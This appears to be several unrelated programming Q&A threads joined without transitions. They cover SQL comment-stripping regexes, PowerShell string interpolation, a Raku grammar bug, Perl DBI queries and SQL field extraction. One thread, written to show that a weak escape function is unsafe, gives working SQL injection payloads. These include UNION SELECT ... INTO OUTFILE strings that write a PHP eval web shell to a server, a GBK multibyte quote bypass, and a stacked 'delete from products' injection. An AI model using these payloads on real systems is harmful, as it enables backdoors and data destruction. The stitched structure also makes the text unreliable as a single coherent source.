I'm trying to come up with a regular expression to remove comments from an SQL statement.
This regex almost works:
(/\*([^*]|[\r\n]|(\*+([^*/]|[\r\n])))*\*+/)|'(?:[^']|'')*'|(--.*)
Except that the last part doesn't handle "--" comments very well. The problem is handling SQL strings, which are delimited with single quotes (').
For example, if I have
SELECT ' -- Hello -- ' FROM DUAL
It shouldn't match, but it's matching.
This is in ASP/VBscript.
I've thought about matching right-to-left, but I don't think VBScript's regex engine supports it. I also tried fiddling with negative lookbehind, but the results weren't good.
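One common way around this is to let the string alternative capture its text and put it back during replacement, so that only the comment alternatives are actually removed. Below is a minimal sketch of that idea in Python rather than VBScript; the names SQL_TOKEN and strip_sql_comments are made up for illustration, and nested block comments are not handled.

```python
import re

# Alternation order matters: a quoted string is tried at each position
# before either comment form, so "--" inside quotes is consumed as string text.
SQL_TOKEN = re.compile(
    r"""
    (?P<string>'(?:[^']|'')*')   # single-quoted literal; a doubled quote is an escaped quote
    | /\*.*?\*/                  # block comment (not nested)
    | --[^\r\n]*                 # line comment up to the end of the line
    """,
    re.VERBOSE | re.DOTALL,
)

def strip_sql_comments(sql):
    """Drop comments but put string literals back unchanged."""
    # For comment matches the "string" group is None, so they become "".
    return SQL_TOKEN.sub(lambda m: m.group("string") or "", sql)
```

With this, SELECT ' -- Hello -- ' FROM DUAL comes back unchanged, because the whole quoted literal is matched and re-emitted before the "--" alternative gets a chance.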
In PHP, I'm using this code to uncomment SQL:
$sqlComments = '#(([\'"]).*?[^\\\]\2)|((?:\#|--).*?$|/\*(?:[^/*]|/(?!\*)|\*(?!/)|(?R))*\*\/)\s*|(?<=;)\s+#ms';
/* Commented version
$sqlComments = '#
(([\'"]).*?[^\\\]\2) # $1 : Skip single & double quoted expressions
|( # $3 : Match comments
(?:\#|--).*?$ # - Single line comments
| # - Multi line (nested) comments
/\* # . comment open marker
(?: [^/*] # . non comment-marker characters
|/(?!\*) # . ! not a comment open
|\*(?!/) # . ! not a comment close
|(?R) # . recursive case
)* # . repeat eventually
\*\/ # . comment close marker
)\s* # Trim after comments
|(?<=;)\s+ # Trim after semi-colon
#msx';
*/
$uncommentedSQL = trim( preg_replace( $sqlComments, '$1', $sql ) );
preg_match_all( $sqlComments, $sql, $comments );
$extractedComments = array_filter( $comments[ 3 ] );
var_dump( $uncommentedSQL, $extractedComments );
This code works for me:
function strip_sqlcomment ($string = '') {
$RXSQLComments = '#(--[^\r\n]*)|(\#[^\r\n]*)|(/\*[\w\W]*?(?=\*/)\*/)#ms';
return (($string == '') ? '' : preg_replace( $RXSQLComments, '', $string ));
}
With a little regex tweaking it could be used to strip comments in any language.
Since you said that the rest of your regex is fine, I focused on the last part. All you need to do is verify that the -- is at the beginning, and then make sure it removes all dashes if there are more than 2. The resulting regex is below:
(^[--]+)
The above is just if you want to remove the comment dashes and not the whole line. You can run the below if you do want everything after it to the end of the line, also
(^--.*)
Originally, I used @Adrien Gibrat's solution. However, I came across a situation where it wasn't parsing quoted strings properly if they contained anything preceded by '--'. I ended up writing this instead:
'[^']*(?!\\)'(*SKIP)(*F) # Make sure we're not matching inside of quotes
|(?m-s:\s*(?:\-{2}|\#)[^\n]*$) # Single line comment
|(?:
\/\*.*?\*\/ # Multi-line comment
(?(?=(?m-s:\h+$)) # Get trailing whitespace if any exists and only if it's the rest of the line
\h+
)
)
# Modifiers used: 'xs' ('g' can be used as well, but is enabled by default in PHP)
Please note that this should be used when PCRE is available. So, in my case, I'm using a variation of this in my PHP library.
Example
remove /**/ and -- comments
function unComment($sql){
$re = '/(--[^\n]*)/i';
$sql = preg_replace( $re, '', $sql );
$sqlComments = '#(([\'"]).*?[^\\\]\2)|((?:\#|--).*?$|/\*(?:[^/*]|/(?!\*)|\*(?!/)|(?R))*\*\/)\s*|(?<=;)\s+#ms';
$uncommentedSQL = trim( preg_replace( $sqlComments, '$1', $sql ) );
preg_match_all( $sqlComments, $sql, $comments );
$sql = preg_replace('/[\x00-\x1F\x80-\xFF]/', '', trim($uncommentedSQL));
return $sql;
}
Please see my answer here. It works both for line comments and for block comments, even nested block comments. I guess you need to use regex with balancing groups, which AFAIK is not available in VBScript.
For Node.js, see pg-minify library. It works with PostgreSQL, MS-SQL and MySQL scripts.
It can handle all types of comments, plus compress the resulting SQL to its bare minimum, to optimize what needs to be sent to the server.
Three regular expressions in an array for a preg_replace is just as fast as a single complex expression. Example for PHP:
function removeSqlComment($sqlString){
$regEx = [
'~(?:".*?"|\'.*?\')(*SKIP)(*F)|--.*$~m',
'~(?:".*?"|\'.*?\')(*SKIP)(*F)|/\*.*?\*/~s',
'~^;?\R~m'
];
return trim(preg_replace($regEx, '', $sqlString));
}
//test
$sqlWithComment = <<<SQL
-- first Comment;
Delete * from /* table1 */table where s = '--'; -- comm2
/*
* comment 3
*/
SELECT ' -- Hello -- ' FROM DUAL;
SQL;
$sql = removeSqlComment($sqlWithComment);
$expected = "Delete * from table where s = '--'; \nSELECT ' -- Hello -- ' FROM DUAL;";
var_dump($sql === $expected); //bool(true)
For all PHP folks: please use this library - https://github.com/jdorn/sql-formatter. I have been dealing with stripping comments from SQL for a couple of years now, and the only valid solution is a tokenizer/state machine, which I lazily resisted writing. A couple of days ago I found this lib, ran 120k queries through it, and found only one bug (https://github.com/jdorn/sql-formatter/issues/93), which was fixed immediately in our fork https://github.com/keboola/sql-formatter.
The usage is simple:
$query = <<<EOF
/*
my comments
*/
SELECT 1;
EOF;
$bareQuery = \SqlFormatter::removeComments($query);
// prints "SELECT 1;"
print $bareQuery;
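To show what "tokenizer/state machine" means here, the following is a rough single-pass sketch in Python. It is not how the library above is implemented; the function name remove_sql_comments is made up, and it assumes quotes are escaped by doubling (backslash escapes and nested block comments are not handled).

```python
def remove_sql_comments(sql):
    """Walk the text once, copying quoted strings verbatim and skipping comments."""
    out = []
    i, n = 0, len(sql)
    while i < n:
        ch = sql[i]
        if ch in ("'", '"'):
            # Inside a quoted run: find the closing quote, treating a
            # doubled quote character as an escaped quote.
            j = i + 1
            while j < n:
                if sql[j] == ch:
                    if j + 1 < n and sql[j + 1] == ch:
                        j += 2
                        continue
                    break
                j += 1
            out.append(sql[i:j + 1])
            i = j + 1
        elif sql.startswith("--", i):
            # Line comment: skip up to the newline, which is kept.
            while i < n and sql[i] != "\n":
                i += 1
        elif sql.startswith("/*", i):
            # Block comment: skip past the closing marker, or to the end if unterminated.
            end = sql.find("*/", i + 2)
            i = n if end == -1 else end + 2
        else:
            out.append(ch)
            i += 1
    return "".join(out)
```

Because the scanner always knows whether it is inside a string, a "--" or "/*" within quotes is never mistaken for a comment, which is the case the pure-regex attempts keep tripping over.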
I have a string into which I want to insert a variable dynamically. Example:
$tag = '{"number" = "5", "application" = "test","color" = "blue", "class" = "Java"}'
I want to accomplish:
$mynumber= 2
$tag = '{"number" = "$($mynumber)", "application" = "test","color" = "blue", "class" = "Java"}'
What I want is to have the variable inserted into the string, but it is not going through. I guess the '' makes everything a literal string. Any recommendations on how I should approach this?
thanks!
I have tried testing in PowerShell by trial and error, and also searched Google.
The reason your current attempt doesn't work is that single-quoted (') string literals in PowerShell are verbatim strings - no attempt will be made at expanding subexpression pipelines or variable expressions.
If you want an expandable string literal without having to escape all the double-quotes (") contained in the string itself, use a here-string:
$mynumber = 2
$tag = @"
{"number" = "$($mynumber)", "application" = "test","color" = "blue", "class" = "Java"}
"@
To add to Mathias' helpful answer:
Mistakenly expecting string interpolation inside '...' strings (as opposed to inside "...") has come up many times before, and questions such as yours are often closed as a duplicate of this post.
However, your question is worth answering separately, because:
Your use case introduces a follow-up problem, namely that embedded " characters cannot be used as-is inside "...".
More generally, the linked post is in the context of argument-passing, where additional rules apply.
Note: Some links below are to the relevant sections of the conceptual about_Quoting_Rules help topic.
In PowerShell:
only "..." strings (double-quoted, called expandable strings) perform string interpolation, i.e. expansion of variable values (e.g. "... $var") and subexpressions (e.g., "... $($var.Prop)")
not '...' strings (single-quoted, called verbatim strings), whose values are used verbatim (literally).
With "...", if the string value itself contains " chars.:
either escape them as `" or ""
E.g., with `"; note that while use of $(...), the subexpression operator, never hurts (e.g. $($mynumber)), it isn't necessary with stand-alone variable references such as $mynumber:
$mynumber= 2
$tag = "{`"number`" = `"$mynumber`", `"application`" = `"test`",`"color`" = `"blue`", `"class`" = `"Java`"}"
Similarly, if you want to selectively suppress string interpolation, escape $ as `$
# Note the ` before the first $mynumber.
# -> '$mynumber = 2'
$mynumber = 2; "`$mynumber` = $mynumber"
See the conceptual about_Special_Characters help topic for info on escaping and escape sequences.
If you need to embed ' inside '...', use '', or use a (single-quoted) here-string (see next).
or use a double-quoted here-string instead (@"<newline>...<newline>"@):
See Mathias' answer, but generally note the strict, multiline syntax of here-strings:
Nothing (except whitespace) must follow the opening delimiter on the same line (@" / @')
The closing delimiter ("@ / '@) must be at the very start of the line - not even whitespace may come before it.
Related answers:
Overview of PowerShell's expandable strings
Overview of all forms of string literals in PowerShell
When passing strings as command arguments, they are situationally implicitly treated like expandable strings (i.e. as if they were "..."-enclosed); e.g.
Write-Output $HOME\projects - see this answer.
Alternatives to string interpolation:
Situationally, other approaches to constructing a string dynamically can be useful:
Use a (verbatim) template string with placeholders, with -f, the format operator:
$mynumber= 2
# {0} is the placeholder for the first RHS operand ({1} for the 2nd, ...)
'"number" = "{0}", ...' -f $mynumber # -> "number" = "2", ...
Use simple string concatenation with the + operator:
$mynumber= 2
'"number" = "' + $mynumber + '", ...' # -> "number" = "2", ...
I am trying to parse a BibTeX author field using the following grammar:
use v6;
use Grammar::Tracer;
# Extract BibTeX author parts from string. The parts are separated
# by a comma and optional space around the comma
grammar Author {
token TOP {
<all-text>
}
token all-text {
[<author-part> [[\s* ',' \s*] || [\s* $]]]+
}
token author-part {
[<-[\s,]> || [\s* <!before ','>]]+
}
}
my $str = "Rockhold, Mark L";
my $result = Author.parse( $str );
say $result;
Output:
TOP
| all-text
| | author-part
| | * MATCH "Rockhold"
| | author-part
But here the program hangs (I have to press CTRL-C to abort).
I suspect the problem is related to the negative lookahead assertion. I tried to remove it, and then the program does not hang anymore, but then I am also not able to extract the last part "Mark L" with an internal space.
Note that for debugging purposes, the Author grammar above is a simplified version of the one used in my actual program.
The expression [\s* <!before ','>] may not make any progress. Since it's in a quantifier, it will be retried again and again (but not move forward), resulting in the hang observed.
Such a construct will reliably hang at the end of the string; doing [\s* <!before ',' || $>] fixes it by making the lookahead fail at the end of the string also (being at the end of the string is a valid way to not be before a ,).
At least for this simple example, it looks like the whole author-part token could just be <-[,]>+, but perhaps that's an oversimplification for the real problem that this was reduced from.
Glancing at all-text, I'd also point out the % quantifier modifier which makes matching comma-separated (or anything-separated, really) things easier.
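For comparison only, the "split on the separator" idea behind the % modifier can be sketched outside of Raku. Here is a small Python illustration; the function name author_parts is made up, and it assumes a comma never occurs inside a part.

```python
import re

def author_parts(field):
    # Split on a comma with optional surrounding whitespace, then drop empty pieces.
    return [part for part in re.split(r"\s*,\s*", field.strip()) if part]
```

For the input "Rockhold, Mark L" this gives the two parts "Rockhold" and "Mark L", with the internal space in the second part preserved.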
When I use the following code, I only seem to print the last results from my array. I think it has something to do with my like clause and the % sign. Any ideas?
my @keywords = <IN>;
my @number = <IN2>;
foreach my $keywords (@keywords)
{
chomp $keywords;
my $query = "select *
from table1 a, table2 b
where a.offer = b.offer
and a.number not in (@number)
and a.title like ('%$keywords%')";
print $query."\n";
my $sth = $dbh->prepare($query)
or die ("Error: Could not prepare sql statement on $server : $sth\n" .
"Error: $DBI::errstr\n");
$sth->execute
or die ("Error: Could not execute sql statement on $server : $sth\n" .
"Error: $DBI::errstr\n");
while (my @results = $sth->fetchrow_array())
{
print OUT "$results[0]\t$results[1]\t$results[2]\t$results[3]\t",
"$results[4]\t$results[5]\t$results[6]\t$results[7]\t",
"$results[8]\n";
}
}
close (OUT);
I'm guessing that your IN file was created on a Windows system, so has CRLF sequences (roughly \r\n) between the lines, but that you're running this script on a *nix system (or in Cygwin or whatnot). So this line:
chomp $keywords;
will remove the trailing \n, but not the \r before it. So you have a stray carriage-return inside your LIKE expression, and no rows match it.
If my guess is right, then you would fix it by changing the above line to this:
$keywords =~ s/\r?\n?\z//;
to remove any carriage-return and/or newline from the end of the line.
(You should also make the changes that innaM suggests above, using bind variables instead of interpolating your values directly into the query. But that change is orthogonal to this one.)
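The two fixes (trimming CR/LF and binding values) can be seen together in a small sketch. It uses Python with the standard sqlite3 module rather than Perl/DBI, and the table name offers, its columns, and the function name find_titles are assumptions made up for the example.

```python
import sqlite3

def find_titles(conn, keyword_lines, excluded_numbers):
    """Return a list of (keyword, rows), one entry per input line."""
    # One "?" per excluded number, so the IN list is bound rather than interpolated.
    marks = ", ".join("?" for _ in excluded_numbers)
    query = (
        "SELECT number, title FROM offers "
        f"WHERE number NOT IN ({marks}) AND title LIKE ?"
    )
    results = []
    for line in keyword_lines:
        keyword = line.rstrip("\r\n")  # drops a trailing \n, \r\n, or lone \r
        params = [*excluded_numbers, f"%{keyword}%"]
        rows = conn.execute(query, params).fetchall()
        results.append((keyword, rows))
    return results
```

Note that the % wildcards go into the bound value, not into the SQL text, so the keyword never needs quoting or escaping.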
Show the output of the print $query and maybe we can help you. Better yet, show the output of:
use Data::Dumper;
$Data::Dumper::Useqq=1;
print Dumper($query);
Until then, your comment about "replaces the an of and" makes me think your input has carriage returns, and the use of @number is unlikely to work if there's more than one.
In an application I'm working on I've found a weak escape function to prevent injection. I'm trying to prove this, but I'm having trouble coming up with a simple example.
The escape function works as follows (PHP example).
function escape($value) {
$value = str_replace("'","''",$value);
$value = str_replace("\\","\\\\",$value);
return $value;
}
I realize this doesn't deal with values encoded using double quotes ("), but all queries are constructed using single quotes (').
Who can defeat this escape function?
Requirements:
Strings in queries are always enclosed in quotes.
Double-quotes are never used.
MySQL connection is set to UTF8.
Simple examples:
$sql = "SELECT id FROM users WHERE username = '" . escape($username) . "' AND password = '" . escape($password) . "'";
$sql = "UPDATE users SET email = '" . escape($email) . "' WHERE id = '" . escape($id) . "'";
If you are just replacing ' with '' then you could exploit this by injecting a \' which will turn into a \'' and this will allow you to break out, because this gives you a "character literal" single quote and a real single quote. However, the replacement of "\\" with "\\\\" negates this attack. The doubled single quote is how single quotes are escaped in MS-SQL; it isn't the proper method for MySQL, although it can work.
The following code proves that this escape function is safe in all but three conditions. The code permutes through all possible variations of control characters, testing each one to make sure an error doesn't occur with a select statement enclosed in single quotes. This code was tested on MySQL 5.1.41.
<?php
mysql_connect("localhost",'root','');
function escape($value) {
$value = str_replace("'","''",$value);
$value = str_replace("\\","\\\\",$value);
return $value;
}
$chars=array("'","\\","\0","a");
for($w=0;$w<4;$w++){
for($x=0;$x<4;$x++){
for($y=0;$y<4;$y++){
for($z=0;$z<4;$z++){
mysql_query("select '".escape($chars[$w].$chars[$x].$chars[$y].$chars[$z])."'") or die("!!!! $w $x $y $z ".mysql_error());
}
}
}
}
print "Escape function is safe :(";
?>
Vulnerable Condition 1: no quote marks used.
mysql_query("select username from users where id=".escape($_GET['id']));
Exploit:
http://localhost/sqli_test.php?id=union select "<?php eval($_GET[e]);?>" into outfile "/var/www/backdoor.php"
Vulnerable Condition 2: double quote marks used
mysql_query("select username from users where id=\"".escape($_GET['id'])."\"");
Exploit:
http://localhost/sqli_test.php?id=" union select "<?php eval($_GET[e]);?>" into outfile "/var/www/backdoor.php" -- 1
Vulnerable Condition 3: single quotes are used, but an alternative character set is in effect.
mysql_set_charset("GBK");
mysql_query("select username from users where id='".escape($_GET['id'])."'");
Exploit:
http://localhost/sqli_test.php?id=%bf%27 union select "<?php eval($_GET[e]);?>" into outfile "/var/www/backdoor.php" -- 1
The conclusion is to always use mysql_real_escape_string() as the escape routine for MySQL. Parameterized query libraries like PDO and ADOdb always use mysql_real_escape_string() when connected to a MySQL database. addslashes() is a FAR BETTER escape routine than this one because it takes care of vulnerable condition 2. It should be noted that not even mysql_real_escape_string() will stop condition 1; a parameterized query library will, however.
Indeed, in addition you could try something with UNION SELECT
shop.php?productid=322
=>
shop.php?productid=322 UNION SELECT 1,2,3 FROM users WHERE 1;--
To display information from other tables.
Of course you would have to change the table name and the numbers inside the UNION SELECT to match the number of columns you have. This is a popular way of extracting data like admin user names and passwords.
The escape function doesn't handle multibyte characters. Check http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string to see how to exploit this escape function.
Have fun hacking your database!
How about when dealing with numbers?
shop.php?productid=322
becomes
SELECT * FROM [Products] WHERE productid=322
shop.php?productid=322; delete from products;--
becomes
SELECT * FROM [Products] WHERE productid=322; delete from products;--
(Not all queries are built with single quotes and strings)
Since you are using UTF-8 as the encoding, this could be vulnerable to an overlong UTF-8 sequence. An apostrophe character ('), while normally encoded as 0x27, could be encoded as the overlong sequence 0xc0 0xa7 (URL-encoded: %c0%a7). The escape function would miss this, but MySQL may interpret it in a way that causes a SQL injection.
As others have mentioned, you really need to be using mysql_real_escape_string at minimum (easy fix in your case), which should be handling character encoding and other issues for you. Preferably, switch to using prepared statements.
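To illustrate why prepared statements sidestep the whole escaping question, here is a minimal sketch using Python's built-in sqlite3 module as a stand-in for MySQL. The users table, its contents, and the login function are hypothetical and only serve the example.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'alice', 's3cret')")

def login(conn, username, password):
    # The values travel separately from the SQL text, so any quotes or
    # backslashes in them are treated as data, never as syntax.
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None
```

Passing something like ' OR '1'='1 as the password simply fails to match any row, because no escaping function is involved in the first place.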
I've never used PHP, however, can you not use Stored Procedure calls instead of direct SQL statements? It seems like a better defense against SQL injection than trying to use an escape function.
An escape function, however, would be useful against malicious javascript.
how about...
\' or 1=1--
Which should be expanded to:
\'' or 1=1--
So using it for id in the following query...
$sql = "UPDATE users SET email = '" . escape($email) . "' WHERE id = '" . escape($id) . "'";
should result in:
$sql = "UPDATE users SET email = '<whatever>' WHERE id = '\'' or 1=1--'";
I have a series of select statements in a text file and I need to extract the field names from each select query. This would be easy if some of the fields didn't use nested functions like to_char() etc.
Given select statement fields that could have several nested parentheses like:
ltrim(rtrim(to_char(base_field_name, format))) renamed_field_name,
Or the simple case of just base_field_name as a field, what would the regex look like in Perl?
Don't try to write a regex parser (though perl regexes can handle nested patterns like that), use SQL::Statement::Structure.
Why not ask the target database itself how it would interpret the queries?
In perl, one can use the DBI to query the prepared representation of a SQL query. Sometimes this is database-specific: some drivers (under the perl DBD:: namespace) support their RDBMS' idea of describing statements in ways analogous to the RDBMS' native C or C++ API.
It can be done generically, however, as the DBI will put the names of result columns in the statement handle attribute NAME. The following, for example, has a good chance of working on any DBI-supported RDBMS:
use strict;
use warnings;
use DBI;
use constant DSN => 'dbi:YouHaveNotToldUs:dbname=we_do_not_know';
my $dbh = DBI->connect(DSN, ..., { RaiseError => 1 });
my $sth;
while (<>) {
next unless /^SELECT/i; # SELECTs only, assume whole query on one line
chomp;
my $sql = /\bWHERE\b/i ? "$_ AND 1=0" : "$_ WHERE 1=0"; # XXX ugly!
eval {
$sth = $dbh->prepare($sql); # some drivers don't know column names
$sth->execute(); # until after a successful execute()
};
print $@, next if $@; # oops, problem with that one
print join(', ', @{$sth->{NAME}}), "\n";
}
The XXX ugly! bit there tries to append an always-false condition on the SELECT, so that the SQL engine doesn't have to do any real work when you execute(). It's a terribly naive approach -- that /\bWHERE\b/i test is no more correctly identifying a SQL WHERE clause than simple regexes correctly parse out SELECT field names -- but it is likely to work.
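The same "ask the database" idea can be sketched in Python, where the DB-API cursor exposes result column names through its description attribute. This example uses the standard sqlite3 module; the function name result_column_names is made up, and wrapping the query in a subselect is a variation of my own to avoid guessing where the WHERE clause is, not what the Perl code above does.

```python
import sqlite3

def result_column_names(conn, select_sql):
    # Strip a trailing semicolon so the query can be nested as a subselect.
    inner = select_sql.strip().rstrip(";")
    # The always-false condition lets the engine skip fetching any rows.
    cur = conn.execute(f"SELECT * FROM ({inner}) WHERE 1=0")
    # Each description entry is a 7-tuple whose first item is the column name.
    return [col[0] for col in cur.description]
```

Whether a subselect wrapper is accepted without an alias, and how unaliased expressions are named, varies between databases, so treat this as a starting point only.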
In a somewhat related problem at the office I used:
my @SqlKeyWordList = qw/select from where .../; # (1)
my @Candidates = split(/\s/, $SqlSelectQuery); # (2)
my %FieldHash; # (3)
for my $Word (@Candidates) {
# skip the word if it is one of the (lowercase) SQL keywords
next if grep { lc($Word) eq $_ } @SqlKeyWordList;
$FieldHash{$Word}++;
}
Comments:
(1) SqlKeyWordList contains all the SQL keywords that are potentially in the SQL statement (we use MySQL; there are many SQL dialects, and choosing/building this list is work, see my comments below!). If someone decided to use a keyword as a field name, you will need a regex after all (better to refactor the code).
(2) Split the SQL statement into a list of words; this is the trickiest part and WILL REQUIRE tweaking. For now it uses Perl's notion of "space" (= not in a word) to split. Splitting the field list (select a,b,c) and the "from" portion of the SQL separately might be advisable here, depending on your SQL statements.
(3) %FieldHash will contain one entry per select field (and gunk, until you have validated your SqlKeyWordList and the regex in (2)).
Beware
there is nothing in this code that could not be done in Python.
your life would be much easier if you can influence the creation of said SQL statements. (e.g. make sure each field is written to a comment)
there are so many things that can/will go wrong in this parsing approach, you really should sidestep the issue entirely, by changing the process (saves time in the long run).
this is the regex we use at the office
my @Candidates=split(/[\s
\(
\)
\+
\,
\*
\/
\-
\n
\
\=
\r
]+/,$SqlSelectQuery
);
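For readers who do not use Perl, the split-and-filter approach can be sketched in Python. The keyword set below is deliberately tiny and only illustrative, and the function name candidate_fields is made up; the split pattern mirrors the punctuation in the character class above.

```python
import re

# Illustrative only: a real list would need every keyword of your SQL dialect.
SQL_KEYWORDS = {"select", "from", "where", "as", "and", "or"}

def candidate_fields(select_sql):
    # Split on whitespace and on the punctuation ( ) + , * / - =
    words = re.split(r"[\s()+,*/\-=]+", select_sql)
    counts = {}
    for word in words:
        # Skip empty pieces and anything that is a known keyword.
        if word and word.lower() not in SQL_KEYWORDS:
            counts[word] = counts.get(word, 0) + 1
    return counts
```

Run on the example field from the question, the result still contains ltrim, rtrim, to_char and format alongside the real field names, which is the "gunk" mentioned in (3).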
How about splitting each line into terms (replace every parenthesis, comma and space with a newline), then sorting:
perl -ne's/[(), ]/\n/g; print' < textfile | sort -u
You'll end up with a lot of content like:
fieldname1
fieldname1
formatstring
ltrim
rtrim
to_char